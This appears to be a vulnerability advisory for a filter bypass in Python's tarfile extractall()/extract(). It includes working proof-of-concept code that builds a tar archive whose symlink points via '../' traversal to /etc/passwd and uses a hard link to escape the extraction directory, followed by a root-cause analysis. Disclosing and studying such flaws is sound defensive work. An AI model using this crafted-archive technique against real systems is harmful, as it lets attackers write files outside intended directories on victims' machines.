Python's TarFile.extractall()
and TarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods.
A bug in how links are processed allows for the filter to be bypassed in some limited cases, and allows for objects to be created under directories that differ to their intended location.
The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.
The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.
Moderate - Should be fixed, but not serious in nature.
In Python run the following code to create a tar file that demonstrates the vulnerability. This tar file will create a symlink that bypasses symlink link destination checking.
import tarfile with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar: # Create a deep directory structure so the c/escape symlink stays inside the path a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy") a.size = 0 a.type = tarfile.REGTYPE tar.addfile(a) # Create a dummy file that creates the b directory (I am lazy) b = tarfile.TarInfo("b/dummy") a.size = 0 a.type = tarfile.REGTYPE tar.addfile(b) # Point "c" to the bottom of the tree in "a" ca = tarfile.TarInfo("c") ca.type = tarfile.SYMTYPE ca.linkname = "a/t/t/t/t/t/t/t/t/t/t" tar.addfile(ca) # Create a symlink. At this point the link should point to a non-existant location under "a" cescape = tarfile.TarInfo("c/escape") cescape.type = tarfile.SYMTYPE cescape.linkname = "../../../../../../../../etc/passwd" tar.addfile(cescape) # Move "c" to point to "b". This means "c/escape" no longer exists. cb = tarfile.TarInfo("c") cb.type = tarfile.SYMTYPE cb.linkname = "b" tar.addfile(cb) # Attempt to create a hard link to "c/escape". Since it doesn't exist it # will basically create "cescape" but at "boom". Which means the directory # traversal now escapes the destination path. boom = tarfile.TarInfo("boom") boom.type = tarfile.LNKTYPE boom.linkname = "c/escape" tar.addfile(boom)
Change into a new directory (e.g. mkdir poc; cd poc
) and run the following in Python to
decompress the tar created above.
import tarfile tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
When extracting a hard link from a tar archive using extractall()
or extract()
the function TarFile.makelink()
is called.
Before calling os.link()
to create a hard link it checks for the existence of the link target by calling os.path.lexist()
.
If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target()
and extracted directly using TarFile._extract_member()
at the location of where the hard link would have been created.
This call to TarFile._extract_member()
does not pass through the filter method.
This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
TarFile._find_link_target()
is challenging to call with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means if extractall()
is being used the link target member must successfully be extractable. This is not required if extract()
is used.
This technique can not be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target
being present. However this attribute is only set in TarFile._get_extract_tarinfo()
, which is not called.
Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31